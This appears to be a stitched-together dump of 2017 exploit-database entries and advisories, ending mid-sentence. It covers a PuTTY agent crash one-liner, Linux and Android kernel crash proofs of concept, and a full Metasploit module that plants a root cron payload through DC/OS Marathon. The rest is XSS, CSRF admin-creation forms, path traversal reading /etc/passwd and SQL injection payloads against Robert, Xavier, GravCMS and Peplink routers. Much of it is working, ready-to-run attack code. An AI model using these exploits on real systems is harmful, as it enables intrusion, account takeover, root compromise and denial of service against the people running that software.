Hence, sending a length field large enough to overflow when 4 is added to it, such as 0xFFFFFFFD, would cause PuTTY to record a value for the total message length (totallen) which was smaller than the amount of data it had already seen (lensofar, which at this point would be 4 bytes for the length field itself). Then, it would assume that the expression totallen-lensofar represented the amount of space it was safe to write into its buffer – but in fact, in the overflowing case, this value would wrap back round to a number just less than 232, far larger than the allocated heap block, and PuTTY could be induced to overwrite its heap with data sent by the attacker.
If your server is running Linux or any reasonably similar Unix, and has the socat network utility installed, then you can use this simple proof of concept to determine whether you are affected. Simply run the shell command
(echo -ne '\xFF\xFF\xFF\xFD\x0B'; cat /dev/zero) | socat stdio unix-connect:$SSH_AUTH_SOCK
and PuTTY will crash.
This bug is only exploitable at all if you have enabled SSH agent forwarding, which is turned off by default. Moreover, an attacker able to exploit this bug would have to have already be able to connect to the Unix-domain socket representing the forwarded agent connection. Since any attacker with that capability would necessarily already be able to generate signatures with your agent's stored private keys, you should in normal circumstances be defended against this vulnerability by the same precautions you and your operating system were already taking to prevent untrusted people from accessing your SSH agent.
This vulnerability was reported by Tim Kosse, and has been assigned CVE ID CVE-2017-6542.
/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:
gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472
(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>
int main()
{
for (;;)
keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
static int sockfd = 0;
static struct sockaddr_in addr = {0};
void fuzz(void * param){
while(1){
addr.sin_family = 0;//rand()%42;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
}
}
int main(int argc, char **argv)
{
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
while(1){
addr.sin_family = 0x1a;//rand()%42;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
}
return 0;
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'DC/OS Marathon UI Docker Exploit',
'Description' => %q{
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS cluster.
},
'Author' => 'Erik Daguerre',
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
],
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}
]
],
'DefaultOptions' => { 'WfsDelay' => 75 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 03, 2017'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
])
end
def get_apps
res = send_request_raw({
'method' => 'GET',
'uri' => target_uri.path
})
return unless res and res.code == 200
# verify it is marathon ui, and is returning content-type json
return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json'
apps = JSON.parse(res.body)
apps
end
def del_container(container_id)
res = send_request_raw({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, container_id)
})
return unless res and res.code == 200
res.code
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
payload_data = nil
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n"
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n"
command << "echo \"\" >> #{echo_cron_path}\n"
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n"
command << "sleep 120"
command
end
def make_container(mnt_path, cron_path, payload_path, container_id)
vprint_status('Setting container json request variables')
container_data = {
'cmd' => make_cmd(mnt_path, cron_path, payload_path),
'cpus' => 1,
'mem' => 128,
'disk' => 0,
'instances' => 1,
'id' => container_id,
'container' => {
'docker' => {
'image' => datastore['DOCKERIMAGE'],
'network' => 'HOST',
},
'type' => 'DOCKER',
'volumes' => [
{
'hostPath' => '/',
'containerPath' => mnt_path,
'mode' => 'RW'
}
],
},
'env' => {},
'labels' => {}
}
container_data
end
def check
return Exploit::CheckCode::Safe if get_apps.nil?
Exploit::CheckCode::Appears
end
def exploit
if get_apps.nil?
fail_with(Failure::Unknown, 'Failed to connect to the targeturi')
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id()
res = send_request_raw({
'method' => 'POST',
'uri' => target_uri.path,
'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json
})
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201
print_status('The docker container is created, waiting for it to deploy')
register_files_for_cleanup(cron_path, payload_path)
sleep_time = 5
wait_time = datastore['WAIT_TIMEOUT']
deleted_container = false
print_status("Waiting up to #{wait_time} seconds for docker container to start")
while wait_time > 0
sleep(sleep_time)
wait_time -= sleep_time
apps_status = get_apps
fail_with(Failure::Unknown, 'No apps returned') unless apps_status
apps_status['apps'].each do |app|
next if app['id'] != "/#{container_id}"
if app['tasksRunning'] == 1
print_status('The docker container is running, removing it')
del_container(container_id)
deleted_container = true
wait_time = 0
else
vprint_status('The docker container is not yet running')
end
break
end
end
# If the docker container does not deploy remove it and fail out.
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to start")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
# Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory
traversal & SQLi
# Date: 07/06/2017
# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
# Vendor website :http://robert.polosson.com/
# Download link : https://github.com/RobertManager/robert/archive/master.zip
# Live demo : http://robertdemo.polosson.com/
# Version: 0.5
# Tested on: Windows 7 x64 SP1 / Kali Linux
Web-application open-source management of equipment park for rental or loan.
Written in HTML, PHP, MySQL, CSS and Javascript.
Description : Multiple security issues have been found : XSS, CSRF,
Directory Traversal, SQLi
1- XSS reflected
http://192.168.3.215/robert/index.php?go=infos%22%3E%3Cscript%3Ealert(1)%3C/script%3E
param vuln : go
script vuln : index.php
2- XSS reflected
POST /robert/modals/personnel_list_techniciens.php
data :
searchingfor=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&searchingwhat=surnom
param vuln : searchingfor
script vuln : personnel_list_techniciens.php
3- XSS Stored
POST /robert/fct/matos_actions.php
data:
action=addMatos&label=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&ref="><script>alert(1)</script>&categorie=son&sousCateg=0&Qtotale=1&dateAchat=&tarifLoc=1&valRemp=1&externe=0&ownerExt=&remarque=%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
param vuln : label, ref et remarque
script vuln : matos_actions.php
4- XSS Stored
POST /robert/fct/packs_actions.php
data
:action=addPack&label=%22%3E%3Cscript%3Ealert(5)%3C%2Fscript%3E&ref="><script>alert(4)</script>&categorie=son&detail=undefined&externe=0&remarque=%22%3E%3Cscript%3Ealert(6)%3C%2Fscript%3E&detail={"2":1}
param vuln : label, ref et remarque
script vuln : packs_actions.php
5- XSS stored
POST /robert/fct/beneficiaires_actions.php
action=modif&id=2&surnom="><script>alert(7)</script>&GUSO=&CS=&prenom="><script>alert(8)</script>&nom="><script>alert(9)</script>&email=&tel=&birthDay=0000-00-00&birthPlace=&habilitations=undefined&categorie=regisseur&SECU=&SIRET=N/A&intermittent=0&adresse=&cp=&ville=&assedic=
param vuln : surnom, prenom, nom
script vuln : beneficiaires_actions.php
6- XSS stored
POST /robert/fct/tekos_actions.php
action=addStruct&id=1&label=test%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&NomRS=&type="><script>alert(3)</script>&adresse=test"><script>alert(4)</script>&codePostal=12312&ville="><script>alert(5)</script>&email="><script>alert(6)</script>&tel=&SIRET="><script>alert(8)</script>&remarque=%22%3E%3Cscript%3Ealert(9)%3C%2Fscript%3E
param vuln : label, type, adresse, ville, email, SIRET et remarque
script vuln : beneficiaires_actions.php
7- CSRF Create new admin
<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="create"/>
<input type="hidden" name="cMail" value="hacked@hacked.com"/>
<input type="hidden" name="cName" value="hacked"/>
<input type="hidden" name="cPren" value="hacked"/>
<input type="hidden" name="cPass" value="hacked"/>
<input type="hidden" name="cLevel" value="7"/>
<input type="hidden" name="cTekos" value="0"/>
<input type="submit" value="CSRFED This Shit"/>
</form>
8- CSRF Change admin password and infos
<form action="http://192.168.3.215/robert/fct/user_actions.php"
method="POST">
<input type="hidden" name="action" value="modifOwnUser"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="email" value="hacked"/>
<input type="hidden" name="nom" value="hacked"/>
<input type="hidden" name="prenom" value="hacked"/>
<input type="hidden" name="password" value="hacked"/>
<input type="submit" value="CSRFED This Shit"/>
</form>
9- Directory traversal on Download fonction ( Read Arbitrary File)
http://192.168.3.215/robert/fct/downloader.php?dir=sql&file=../../../../../../etc/passwd
param vuln : file
script vuln : downloader.php
10- Directory traversal on Upload fonction (Upload file in root path)
POST
/robert/fct/uploader.php?dataType=tekos&folder=../../config&qqfile=filename.jpg
HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
X-Requested-With: XMLHttpRequest
X-File-Name: filename.jpg
Content-Type: application/octet-stream
Referer: http://192.168.3.215/robert/index.php?go=gens
Content-Length: 99550
Cookie: YOURCOOKIE
Connection: close
...snip...
file data
...snip...
param vuln : folder
script vuln : uploader.php
11- Directory traversal on Delete fonction (Delete Arbitrary File)
POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 42
Cookie:YOURCOOKIE
Connection: close
action=supprFichier&idPlan=4&file=../../../../tested.txt
param vuln : file
script vuln : plans_actions.php
11- SQL Injection
POST /robert/fct/plans_actions.php HTTP/1.1
Host: 192.168.3.215
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.3.215/robert/index.php?go=calendrier
Content-Length: 20
Cookie: YOURCOOKIE
Connection: close
action=loadPlan&ID=2'
POST parameter 'ID' is vulnerable. Do you want to keep testing the others
(if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 397
HTTP(s) requests:
---
Parameter: ID (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
(NOT)
Payload: action=loadPlan&ID=2' OR NOT 8111=8111#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: action=loadPlan&ID=2' AND (SELECT 3865 FROM(SELECT
COUNT(*),CONCAT(0x7171787171,(SELECT
(ELT(3865=3865,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XhTe
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: action=loadPlan&ID=2';SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: action=loadPlan&ID=2' OR SLEEP(5)-- zwwN
---
param vuln : ID
script vuln : plans_actions.php
------------------------------------------------------------------------------------------------------------------------------
#### Special Thanks to SC, PC and Mana l'artiste from HTTPCS - Ziwit
SecTeam ####
------------------------------------------------------------------------------------------------------------------------------
Document Title:
===============
Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2076
Release Date:
=============
2017-06-06
Vulnerability Laboratory ID (VL-ID):
====================================
2076
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page.
You can also protect sections of pages. Secure your web pages or sections of content dependant on whether your users are logged in or out,
or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.
(Copy of the Homepage: https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.
Vulnerability Disclosure Timeline:
==================================
2017-06-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Siggles
Product: Xavier - PHP Login Script & User Management Admin Panel 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple sql-injection vulnerabilities has been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application.
The issue allows remote attackers to inject own malicious sql commands to compromise the web-application & database management system.
The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuserdit.php` and `editgroup.php` files.
Remote attackers with privileged user accounts are able to compromise the web-application and database management system by injection of sql
commands via GET method request. The attacker vector is client-side and the request method to inject the sql commands is GET. The vulnerability
is a classic order by sql-injection.
The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3.
Exploitation of the remote sql-injection web vulnerability requires an authenticated web-application user account and no user interaction.
Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] adminuseredit.php
[+] editgroup.php
Vulnerable Parameter(s):
[+] usertoedit
[+] log_id
Proof of Concept (PoC):
=======================
The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Example
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[SQL-INJECTION VULNERABILITY!]
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[SQL-INJECTION VULNERABILITY!]
PoC: Exploitation
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--
--- SQL Error & Exception Logs ---
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]:
Column not found: 1054 Unknown column '100' in 'order clause''
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1'
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
#1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
-
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]:
Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1'
in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59 Stack trace:
#0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...')
#1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'')
#2 {main} thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[SQL-INJECTION VULNERABILITY!]--
Mime Type[text/html]
Request Header:
Host[xavier-php.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache]
Keep-Alive[timeout=2, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
-
20:49:05.559[216ms][total 277ms] Status: 200[OK]
GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[SQL-INJECTION VULNERABILITY!]--
Mime Type[text/html]
Request Header:
Host[xavier-php.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[PHPSESSID=6b9f9560a6a0d35b12b8603424cf2525]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache]
Keep-Alive[timeout=2, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
https://xavier-php.localhost:8080/
https://xavier-php.localhost:8080/xavier/
https://xavier-php.localhost:8080/xavier/admin/
https://xavier-php.localhost:8080/xavier/admin/editgroup.php
https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a parse via escape of the vulnerable parameters in the affected php files.
Restrict the prameter input and use a prepared statement to secure the functions of the admin panel.
Disallow to preview errors in the php code of the panel to prevent attacks.
Security Risk:
==============
The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: GravCMS Core (Admin Plugin) v1.4.2 - Persistent Cross-Site Scripting
# Date: 2017-06-07
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://getgrav.org/
# Software Link: https://getgrav.org/download/core/grav-admin/1.2.4
# Version: 1.4.2
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT
Release Date:
=============
2017-06-07
Product & Service Introduction:
===============================
Grav is built and maintained by a team of dedicated and passionate developers, designers and users.
As Grav is an open source project we greatly appreciate user contribution and commitment. These are the key folks that make this all possible.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent vulnerability researcher discovered a Persistent Cross-Site Scripting Vulnerability in GravCMS Admin Plugin (v 1.4.2)
Vulnerability Disclosure Timeline:
==================================
2017-06-07: Found the vulnerability.
2017-06-07: Reported to vendor.
2017-06-07: Published.
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6.
Exploitation of the persistent xss web vulnerability requires a limited admin user account and only low user interaction.
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external
redirect to malicious sources and persistent manipulation of affected or connected web module context.
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by restricted user accounts with low user interaction.
For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
Payload (Exploitation): [Click Me](javascript:alert(1))
[+] Manual steps to reproduce ..
1. Login with the admin or editor account in GravCMS
2. Go to edit page option (e.g http://127.0.0.1/cms/grav-admin/admin/pages/home)
3. Put the payload "[Click Me](javascript:alert(1))" (without quotes) in the content of page
4. Save Page!
5. Go to the index page (e.g http://127.0.0.1/cms/grav-admin/)
6. Click on "Click Me"
7. The Javascript execution occurs - Successful reproduce of the persistent cross site scripting vulnerability!
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
X41 D-Sec GmbH Security Advisory: X41-2017-005
Multiple Vulnerabilities in peplink balance routers
===================================================
Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to access the
administrative web interface with admin credentials, delete files,
perform CSRF and XSS attacks.
Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.
SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter which is set e.g. when accessing
https://ip/cgi-bin/MANGA/admin.cgi.
The injection can be checked with the following command:
./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a
The vulnerability in the Peplink device allows to access the SQLite
session database containing user and session variables. By using the the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attackers login.
bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2
By forming specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session in case the
username existed and no session if it did not exist. In the first case
the server did not set a new session cookie in the response to the request.
SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')
Workarounds
-----------
Install vendor supplied update.
No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross site request forgery attacks. This allows an attacker to
execute commands, if a logged in user visits a malicious website. This
can for example be used to change the credentials of the administrative
webinterface.
Workarounds
-----------
Install vendor supplied update.
Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. In case one of these devices is
compromised the attacker can gain access to the cleartext passwords and
abuse them to compromise further systems.
Workarounds
-----------
Install vendor supplied update.
XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site-scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to abuse the the
orig_url parameter to trigger a cross-site-scripting issue in
/guest/preview.cgi. The injection is directly into existing JavaScript.
This executes the JavaScript in the victims browser, which can be abused
to steal session cookies.
Workarounds
-----------
Install vendor supplied update.
File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
Summary and Impact
------------------
A logged in user can delete arbitrary files on the Peplink devices, by
abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path
is provided to the upfile.path parameter the file provided in the path
is deleted during the process. This can be abused to cause a denial of
service (DoS). In combination with the missing CSRF protection, this can
be abused remotely via a logged in user.
Workarounds
-----------
Install vendor supplied update.
Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
If the webinterface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1
This displays the following:
-----8<------------------------------------------------
Master LAN Address = [ <internal ip> / <netmask> ]
Serial Number = [ <serial number> ]
HA Group ID = [ <group id> ]
Virtual IP = [ <internal ip> / <netmask> ]
Submitted syncid = [ <syncid> ]
-----8<------------------------------------------------
This information can be valuable for an attacker to exploit other issues.
Workarounds
-----------
Install vendor supplied update.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
